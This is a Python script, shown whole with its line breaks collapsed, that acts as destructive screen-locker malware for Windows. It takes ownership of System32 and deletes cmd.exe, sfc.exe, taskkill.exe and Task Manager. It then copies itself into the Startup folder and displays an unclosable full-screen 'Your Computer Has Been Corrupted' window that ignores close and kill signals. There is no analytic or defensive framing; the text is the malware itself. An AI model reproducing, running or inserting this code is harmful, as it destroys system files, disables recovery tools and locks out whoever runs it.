import wget,os,signal,sys,webbrowser,shutil from tkinter import * startup = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" try: os.system("takeown /f \"C:\\Windows\\System32\\ \" /r /d y") os.system("icacls \"C:\\Windows\\System32\\ \" /grant %USERNAME%:F /t") os.remove("C:\\Windows\\System32\\cmd.exe") os.remove("C:\\Windows\\System32\\sfc.exe") os.remove("C:\\Windows\\System32\\taskkill.exe") os.remove("C:\\Windows\\System32\\taskmanager.exe") except: pass def bosluk(): pass def mainapp(): w = Tk() w.title("WININITIN") w.attributes("-fullscreen",1) w.attributes("-alpha",0.8) w.attributes("-topmost",1) w.config(bg="black") ip = Label(w,text="Your Computer Has Been Corrupted.",font=("System",50,"bold"),bg="black",fg="white") ip2 = Label(w,text="Click Here For More Information",font=("System",5,"bold"),bg="black",fg="white") signal.signal(signal.SIGINT,bosluk) signal.signal(signal.SIGTERM,bosluk) w.protocol("WM_DELETE_WINDOW",bosluk) ip.pack(anchor="w") ip2.bind("",lambda e:webbrowser.open("microsoft.com")) ip2.bind("",lambda e:ip2.config(font=("System",5,"bold","underline")) ) ip2.bind("",lambda e:ip2.config(font=("System",5,"bold")) ) ip2.pack(anchor="e",side="bottom") w.mainloop() if os.path.exists(startup+"\\wininitin.exe"): mainapp() else: shutil.copy(sys.executable,startup+"\\wininitin.exe")